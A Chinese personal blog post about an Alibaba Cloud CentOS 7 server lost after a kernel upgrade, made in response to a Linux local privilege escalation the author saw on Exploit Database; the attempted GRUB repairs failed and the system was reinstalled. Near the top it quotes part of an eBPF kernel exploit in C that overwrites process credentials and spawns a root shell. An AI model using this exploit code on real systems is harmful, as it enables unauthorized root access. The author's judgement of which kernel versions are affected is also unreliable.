事件结局

阿里云服务器系统 Centos 7被迫重装

对我影响

意味着网站数据从1->0 ,域名为htwyy.cn (hexo),www.htwyy.cn(wordpress),***lim.htwyy.cn*** (library),api.htwyy.cn (api) 数据全没

事件起因

要从这个网站说起Exploit Database ,kali 的可利用漏洞模块数据库
![Pasted image 20221129105755.png](/img/Pasted image 20221129105755.png)
如图所示 Linux 内核为4.13.9 发行版为 Ubuntu 16.04 / Fedora27 存在本地权限提升漏洞

![Pasted image 20221129110241.png](/img/Pasted image 20221129110241.png)
即普通用户到root 用户权限(至高权限)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
#include <errno.h>
#include <fcntl.h>
#include <stdarg.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <linux/bpf.h>
#include <linux/unistd.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <sys/un.h>
#include <sys/stat.h>
#include <sys/personality.h>

	.
	.
	.
	
	/*
	 * scan forward for expected sk_rcvtimeo value.
	 *
	 * struct sock {
	 *    [...]
	 *    const struct cred      *sk_peer_cred; 
	 *    long                    sk_rcvtimeo;             
	 *  };
	 */
	for (int i = 0; i < 100; i++, sock_addr += 8) {
		if(read64(sock_addr) == 0x7FFFFFFFFFFFFFFF) {
			unsigned long cred_struct = read64(sock_addr - 8);
			if(cred_struct < PHYS_OFFSET) {
				continue;
			}
			
			unsigned long test_uid = (read64(cred_struct + 8) & 0xFFFFFFFF);
			
			if(test_uid != uid) {
				continue;
			}
                        msg("Sock->sk_rcvtimeo at offset %d\n", i * 8);
                        msg("Cred structure at %llx\n", cred_struct);
			msg("UID from cred structure: %d, matches the current: %d\n", test_uid, uid);
			
			return cred_struct;
		}
	}
	fail("failed to find sk_rcvtimeo.\n");
}

static void
hammer_cred(unsigned long addr) {
	msg("hammering cred structure at %llx\n", addr);
#define w64(w) { write64(addr, (w)); addr += 8; }
	unsigned long val = read64(addr) & 0xFFFFFFFFUL;
	w64(val); 
	w64(0); w64(0); w64(0); w64(0);
	w64(0xFFFFFFFFFFFFFFFF); 
	w64(0xFFFFFFFFFFFFFFFF); 
	w64(0xFFFFFFFFFFFFFFFF); 
#undef w64
}

int
main(int argc, char **argv) {
	initialize();
	hammer_cred(find_cred());
	msg("credentials patched, launching shell...\n");
	if(execl("/bin/sh", "/bin/sh", NULL)) {
		fail("exec %s\n", strerror(errno));
	}
}

权限提升方法(部分),详细方法,在这里
可见,Linux 内核低于4.10 我想应该都有此漏洞,于是去查看 我的阿里云服务器内核版本

Linux iZuf68v6tepfikkhntiacqZ 3.10.0-1160.80.1.el7.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Nov 25 12:10:41 EST 2022 x86_64 x86_64 x86_64 GNU/Linux

云服务器内核为3.10.10.el7

升级过程

此过程参考google检索文档

  1. 更新仓库yum 

    1
    yum -y update

    -y 选项可以在每次需要确认时,自动使用 yes

  2. 启用 ELRepo 仓库

    1
    2
    3
    rpm --import https://www.elrepo.org/RPM-GPG-KEY-elrepo.org

    rpm -Uvh http://www.elrepo.org/elrepo-release-7.0-2.el7.elrepo.noarch.rpm

    rpm 命令未找到,则 yum -y install rpm

  3. 查看可用内核包

    1
    yum --disablerepo="*" --enablerepo="elrepo-kernel" list available

    展示如下(部分)

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    Loaded plugins: fastestmirror
    Loading mirror speeds from cached hostfile
     * elrepo-kernel: mirrors.tuna.tsinghua.edu.cn
    Available Packages
    elrepo-release.noarch                       7.0-6.el7.elrepo       elrepo-kernel
    kernel-lt.x86_64                            5.4.225-1.el7.elrepo   elrepo-kernel
    kernel-lt-devel.x86_64                      5.4.225-1.el7.elrepo   elrepo-kernel
    kernel-lt-doc.noarch                        5.4.225-1.el7.elrepo   elrepo-kernel
    kernel-lt-tools.x86_64                      5.4.225-1.el7.elrepo   elrepo-kernel
    kernel-lt-tools-libs.x86_64                 5.4.225-1.el7.elrepo   elrepo-kernel
    kernel-lt-tools-libs-devel.x86_64           5.4.225-1.el7.elrepo   elrepo-kernel
    kernel-ml-devel.x86_64                      6.0.10-1.el7.elrepo    elrepo-kernel
    kernel-ml-doc.noarch                        6.0.10-1.el7.elrepo    elrepo-kernel
    kernel-ml-headers.x86_64                    6.0.10-1.el7.elrepo    elrepo-kernel
    kernel-ml-tools.x86_64                      6.0.10-1.el7.elrepo    elrepo-kernel

  4. 安装内核
    安装最新稳定版本内核

1
yum --enablerepo=elrepo-kernel install kernel-ml

主线稳定内核(mainline stable)ml
长期支持内核(long term support)lt

安装指定版本内核 将 kernel-ml 替换 如 kernel-lt.x86_64

  1. 设置自启

查看系统可用内核

1
sudo awk -F\' '$1=="menuentry " {print i++ " : " $2}' /etc/grub2.cfg

执行如下

1
2
3
4
5
6
# sudo awk -F\' '$1=="menuentry " {print i++ " : " $2}' /etc/grub2.cfg
0 : CentOS Linux (6.0.10-1.el7.elrepo.x86_64) 7 (Core)
1 : CentOS Linux (3.10.0-1160.80.1.el7.x86_64) 7 (Core)
2 : CentOS Linux (3.10.0-1062.18.1.el7.x86_64) 7 (Core)
3 : CentOS Linux (3.10.0-1062.el7.x86_64) 7 (Core)
4 : CentOS Linux (0-rescue-20200426154603174201708213343640) 7 (Core)

设置grub2

1
sudo grub2-set-default 0

0 代表 0 : CentOS Linux (6.0.10-1.el7.elrepo.x86_64) 7 (Core) 启动此项内核

编辑grub配置文件

1
vim /etc/default/grub
1
2
3
4
5
6
7
GRUB_TIMEOUT=1
GRUB_DISTRIBUTOR="$(sed 's, release .*$,,g' /etc/system-release)"
GRUB_DEFAULT=0
GRUB_DISABLE_SUBMENU=true
GRUB_TERMINAL_OUTPUT="console"
GRUB_CMDLINE_LINUX="crashkernel=auto spectre_v2=retpoline rhgb quiet net.ifnames=0 console=tty0 console=ttyS0,115200n8 noibrs nvme_core.io_timeout=4294967295 nvme_core.admin_timeout=4294967295"
GRUB_DISABLE_RECOVERY="true"

修改 GRUB_DEFAULT=0 保存并退出

创建grub配置文件

1
sudo grub2-mkconfig -o /boot/grub2/grub.cfg

Linux终端无提示,则成功

重启

1
sudo reboot

而我重启却,无法启动……

事故分析

创建grub配置失败,导致grub引导启动程序执行时出错,无法开机进入系统

那么Linux 启动过程是怎样的呢?
![[Pasted image 20221129140610.png]]

由于更改了默认内核启动版本,而为生成相应配置文件

在上图 GRUP启动引导阶段Stage2阶段 时,grub找不到相关命令,无法建立虚拟文件系统,无法调用内核

尝试救援

大量google检索 grub 救援模式 之后,失败告终
意味着 阿里云服务器Centos 7 无法开机进入系统

  1. 解决方法一[x]
    ![[Pasted image 20221129143900.png]]
    google翻译一下
    ![[Pasted image 20221129143937.png]]
    由于只能远程连接,并不能使用 USB 安装GRUB引导加载程序

  2. 解决方法二[x]
    grub 命令行修复
    ![[Pasted image 20221129153219.png]]
    详细命令见,
    官网

  3. 解决方法三[√]
    阿里云服务器快照[x]
    重装系统,解决99%问题
    于是有了halo 博客